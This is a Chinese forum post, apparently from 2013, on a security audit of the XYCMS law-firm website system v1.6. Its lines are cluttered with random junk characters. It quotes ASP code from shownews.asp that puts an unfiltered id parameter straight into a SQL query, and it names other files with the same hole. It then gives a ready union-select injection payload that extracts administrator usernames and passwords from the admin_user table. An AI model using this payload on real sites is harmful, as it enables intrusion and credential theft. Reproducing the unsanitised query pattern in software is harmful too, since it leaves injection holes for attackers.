前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
5 ^0 o4 q. X8 n/ Y: n' ^" h 4 C& K5 E3 m. g* X* L& g
淫荡分割线+ v3 e* N: |. s8 w
--------------------------------------------------------
: H; D. \$ |. s$ X 0 R& D4 T2 L: o$ ^+ X( e1 L
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
$ @) f. z) m* _% P8 e7 ?& E8 s源码地址:http://down.chinaz.com/soft/29233.htm
) ~* x# f' P3 E3 X 0 m3 {" Z* N% k# ]% D/ w; v$ _
漏洞文件:shownews.asp ]9 I9 b2 O5 b) `/ D8 R7 Z
漏洞代码:7-13行
9 c. t/ e6 y* a6 f; V4 A- S0 h' [ + k) l6 q2 C q2 o. H0 u* J
# i3 S# ?' v" P<% , J( D4 W; k4 s# V2 B3 N
id=request.QueryString("id")
' ^. W* H6 m+ v5 ? ; H! A8 Y& v% M1 s0 C8 }
set snews=server.createobject("adodb.recordset") 9 D; K! }$ s* e6 ]0 q
exec="select * from [news] where id="&id: b% t- e$ k" y" r6 U% f2 b
snews.open exec,conn,1,1( _8 c2 C6 D$ `$ x1 V
%>" E: v4 a0 \$ M, z
5 U+ e r4 q1 r0 Y3 |9 b2 f) T% ` L- O9 k$ I3 }- R* R6 l) G, w7 g$ e+ N
什么过滤都没有 直造成注入, i( N+ M6 |+ k; N$ {
1 V+ n+ _6 a# w- s8 ~ N" r) r' v注入点:http://127.0.0.1:99/shownews.asp?id=xx
& u# G2 @& L+ D' ~) M
0 \7 k) e# B5 ~7 k其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
+ W8 q$ U* T# k8 R7 |! ^8 B8 v- ^
3 q5 Y/ ^6 i0 ` 5 F2 a, L3 e; M' L. W' i
exp: union select 1,admin,password,4,5,7 from admin_user) Q% I K# r* |' [2 e, Y5 ~
6 }% l: ]5 Q$ p8 A
|
发表于 2013-4-4 17:28:12
收藏
支持
反对